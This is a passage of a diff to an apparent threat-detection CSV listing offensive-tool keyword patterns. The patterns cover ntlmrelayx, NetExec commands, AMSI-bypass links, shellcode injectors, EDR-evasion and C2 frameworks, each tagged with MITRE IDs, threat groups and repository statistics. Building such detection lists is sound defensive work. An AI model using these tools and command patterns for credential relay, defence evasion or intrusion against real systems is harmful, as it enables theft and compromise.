Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*nth --text 5f4dcc3b5aa765d61d8327deb882cf99*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ntlm.py *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*ntlm_info_enumeration.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*NTLMChallengeBase64*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*NTLMChallengeBase64*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ntlm.py *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ntlm_info_enumeration.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*NTLMChallengeBase64*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NTLMChallengeBase64*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ntlm-info.py*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*ntlmquic.*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*ntlmquic-go*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" @@ -14213,18 +14376,18 @@ "*NTLMRelay2Self.git*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z" "*ntlmrelayx -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ntlmrelayx --*","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ntlmrelayx.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ntlmrelayx.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*ntlmrelayx.py.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*ntlmscan.py*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*ntlmscan-master.zip*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*ntlmv1.py --ntlmv1 *::*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" -"*ntlmv1.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*ntlmv1_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ntlmv1.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*ntlmv1_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*ntlmv1-multi --ntlmv1 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*NtoskrnlOffsets.csv*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*NtRemoteLoad-main*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" -"*ntrights.exe*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*NtUserMNDragOverExploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*NtRemoteLoad-main*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*ntrights.exe*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*NtUserMNDragOverExploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*NtWa1tF0rS1ngle0bj3ct Executed*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*Nuages*/Implants*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*nuages.clearImplants *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" @@ -14245,26 +14408,28 @@ "*Nuke_Privileges /Process:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*NUL0x4C/APCLdr*","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","3","285","51","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z" "*NUL0x4C/AtomLdr*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" -"*null-byte.com/bypass-amsi*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*NullSessionScanner.*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","1859","249","2023-09-18T17:29:51Z","2018-08-31T17:42:48Z" -"*nxc ftp *bruteforce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc http *--port*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc ldap * --admin-count*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc ldap * --trusted-for-delegation*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc mssql *--get-file*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc mssql *--local-auth*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc ssh *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc winrm * -X *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nysm.skel.h*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*nysm-master.zip*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*null-byte.com/bypass-amsi*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*NullSessionScanner.*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","1860","249","2023-09-18T17:29:51Z","2018-08-31T17:42:48Z" +"*nxc ftp *bruteforce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc http *--port*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc ldap * --admin-count*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc ldap * --trusted-for-delegation*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - 